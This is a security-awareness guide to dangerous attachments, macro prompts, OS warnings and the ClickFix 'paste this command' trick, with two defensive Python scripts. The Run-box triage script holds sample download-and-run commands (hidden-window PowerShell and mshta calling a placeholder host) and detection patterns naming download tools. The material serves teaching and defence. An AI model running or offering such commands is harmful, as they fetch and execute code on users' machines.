Dangerous files, macros, and the "paste this command" trick

Spotting a bad email is only half the battle. Many attacks are designed to walk you — often through a few clicks and redirects — to one final step: getting you to run something on your own computer. Once you run their file or command, the warning signs no longer matter; you've let them in. This guide is about that final step.

The end goal: make you download or run something

A common chain looks like: convincing email → click → a page that "redirects" you a few times → a download, or an instruction to run a command. If a message or website is steering you toward downloading a file, opening an attachment, or running a command, treat that as the moment of maximum danger and stop to think.

If your browser bounces you through several redirects to reach a "download" or "verify" step, that itself is a warning sign. Legitimate downloads come straight from the vendor's own site.

File types to be careful with

A real document is almost never a program. Be especially wary of these attachment/download types:

For each category: the extensions, and why they are risky.

  • Programs / installers (.exe .msi .scr .com .bat .cmd .pif): these run code directly. A document should never be one of these.
  • Scripts (.js .vbs .ps1 .wsf .hta .jar .py): small text files that execute commands when opened.
  • Disk images & archives (.iso .img .vhd .zip .rar .7z, especially password-protected ones): used to smuggle the items above past email scanners. A password in the email body ("password: 1234") is a hallmark of malware delivery.
  • Shortcuts & system files (.lnk .reg .scf): look harmless; can launch programs or change system settings.
  • Macro-enabled Office docs (.docm .xlsm .pptm): Office files that can carry runnable "macros" (see below).

Double extensions are a classic trick: Invoice.pdf.exe or Photo.jpg.scr. Windows often hides the last extension for known file types, so the name looks like a PDF or an image. The real type is always the last extension (.exe and .scr here), so these are programs, not documents.
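The table and the double-extension rule can be turned into a small check that an IT team can run over attachment names before they reach a user. This is an added example written for this guide, not code from the guide's author; the extension groups are the ones listed above, and the list of "document-looking" extensions and the sample file names are assumptions constructed for the demonstration.

```python
import os

# Extension groups taken from the table above (added example, not part of the original guide).
RISKY_EXTENSIONS = {
    "program / installer": {".exe", ".msi", ".scr", ".com", ".bat", ".cmd", ".pif"},
    "script": {".js", ".vbs", ".ps1", ".wsf", ".hta", ".jar", ".py"},
    "disk image / archive": {".iso", ".img", ".vhd", ".zip", ".rar", ".7z"},
    "shortcut / system file": {".lnk", ".reg", ".scf"},
    "macro-enabled Office doc": {".docm", ".xlsm", ".pptm"},
}

# Constructed list of extensions that attackers place second-to-last so the name
# "looks like" a document or image (assumption for this example).
DOCUMENT_LOOKING = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
                    ".txt", ".jpg", ".jpeg", ".png", ".gif"}


def classify(filename):
    """Return what a file really is, judged by its LAST extension only."""
    # Strip any directory part (Windows or POSIX style) and compare case-insensitively.
    name = os.path.basename(filename.replace("\\", "/")).strip().lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[-1]:
        return {"name": name, "real_extension": "", "category": "unknown", "disguised": False}
    real_ext = "." + parts[-1]
    category = next((cat for cat, exts in RISKY_EXTENSIONS.items() if real_ext in exts), "other")
    # Double-extension trick: a document/image-looking extension right before a risky one.
    disguised = (
        len(parts) >= 3
        and category != "other"
        and ("." + parts[-2]) in DOCUMENT_LOOKING
    )
    return {"name": name, "real_extension": real_ext, "category": category, "disguised": disguised}


def verdict(filename):
    """One-line, plain-language advice for a file name."""
    info = classify(filename)
    if info["category"] in ("other", "unknown"):
        return f"{info['name']}: not in the risky list (still confirm the sender if unexpected)"
    msg = f"{info['name']}: {info['category']} ({info['real_extension']}) - do not open"
    if info["disguised"]:
        msg += "; the name mimics a document or image (double extension)"
    return msg


if __name__ == "__main__":
    # Constructed sample names, including the two from the guide.
    for sample in ["Invoice.pdf.exe", "Photo.jpg.scr", "Q3-report.docx",
                   "C:\\Downloads\\setup.msi", "README"]:
        print(verdict(sample))
```

The check deliberately looks only at the last extension, which is the one the operating system uses to decide how to open the file; anything earlier in the name is just decoration.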

When in doubt: don't open it. Confirm with the sender through a known channel, and get invoices/documents as plain PDFs from sources you trust.

Macros and the "Enable Content" trap

A macro is a little program that can live inside a Word, Excel, or PowerPoint file. Macros have legitimate uses, but attackers use them to run malware the instant you allow them.

The tell is the document that, on opening, shows a yellow bar or pop-up urging you to "Enable Editing" and "Enable Content / Enable Macros" to "view the document." That instruction is the attack. A normal document just displays. Modern Microsoft Office now blocks macros from internet-sourced files by default and shows a red "SECURITY RISK — Microsoft has blocked macros from running" banner — that banner is protecting you. Do not click around it.

Your computer's warnings are friends, not obstacles

Operating systems try to stop this final step. Learn to trust these warnings instead of clicking through them:

  • Windows SmartScreen: "Windows protected your PC" — appears when you try to run an unrecognized program. The safe choice is Don't run (the "More info → Run anyway" link is how people get infected).
  • macOS Gatekeeper: "…can't be opened because it is from an unidentified developer," or a warning that an app was downloaded from the internet. Don't override it for something that arrived via a link or attachment.
  • Browser download warnings: "This file may harm your computer / isn't commonly downloaded." Believe it.
  • User Account Control (the screen dims and asks permission): if a file you weren't deliberately installing triggers this, say No.

These prompts exist precisely because you're at the dangerous step. A legitimate app you sought out is worth a moment's thought; a file that was sent to you and trips these warnings should be deleted.

The "press Windows + R and paste this" trick (ClickFix)

A newer, fast-growing attack skips the file download entirely and gets you to run a command by hand. You'll see a page — often a fake CAPTCHA ("Verify you are human"), a fake error, or a "fix this problem" prompt — with step-by-step instructions like:

  1. Press Windows + R
  2. Press Ctrl + V
  3. Press Enter

Pressing Windows + R opens the Run box on Windows; the page has quietly copied a malicious command to your clipboard, and those steps paste and execute it — installing malware with your own hands. Mac versions tell you to open Terminal and paste a command.

The rule is absolute: no legitimate website, CAPTCHA, or "human verification" ever needs you to press Windows + R, open Terminal/PowerShell, or paste and run a command. Real "prove you're human" checks are click-the-images or a checkbox — never "run this command." If a page asks you to do that, close it. Nothing legitimate works this way.
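For the IT or help-desk side, the Run box keeps a short history of what was typed into it, which makes it possible to check after the fact whether someone followed such instructions. The script below is an added example, not part of the original guide: it scores Run-box history entries for the signs a pasted command usually carries (a command interpreter or download tool, a web address, a hidden window, an encoded command). The history entries are constructed for the demonstration in the shape Windows stores them (under the RunMRU registry key, each value is the typed command followed by "\1"; that trailing-marker detail is an assumption of this example), and the keyword lists are the author's choices, not an official list.

```python
import re

# Constructed sample of Run-box history in the form Windows keeps it under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: value name -> "command\1".
# These entries are made up for the example; "example.invalid" is a placeholder host.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -NoProfile -WindowStyle Hidden -Command '
         '"Invoke-WebRequest http://example.invalid/placeholder"\\1',
    "d": "mshta https://example.invalid/placeholder\\1",
    "e": "calc\\1",
}

# Heuristics (assumptions chosen for this example): things a normal user rarely types
# into the Run box but pasted commands very often contain.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil|bitsadmin|rundll32)\b", re.I)
WEB_ADDRESS = re.compile(r"https?://", re.I)
HIDDEN_WINDOW = re.compile(r"-(w|windowstyle)\s+hidden", re.I)
ENCODED = re.compile(r"-(e|enc|encodedcommand)\b", re.I)


def reasons_for(command):
    """Return the list of suspicious traits found in one Run-box command (empty if none)."""
    reasons = []
    if INTERPRETERS.search(command):
        reasons.append("launches a command interpreter or download tool")
    if WEB_ADDRESS.search(command):
        reasons.append("contains a web address")
    if HIDDEN_WINDOW.search(command):
        reasons.append("hides its window")
    if ENCODED.search(command):
        reasons.append("uses an encoded command")
    return reasons


def triage(runmru):
    """Flag Run-box history entries that carry one or more suspicious traits."""
    findings = []
    for slot, raw in runmru.items():
        # Drop the trailing "\1" marker (stored as a backslash and the digit 1).
        command = raw[:-2] if raw.endswith("\\1") else raw
        reasons = reasons_for(command)
        if reasons:
            findings.append({"slot": slot, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_RUNMRU):
        print(f"[{finding['slot']}] {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Any flagged entry is a reason to treat the machine as possibly compromised and to ask the user what page told them to paste it; a plain "notepad" or a file-share path is normal Run-box use and is left alone.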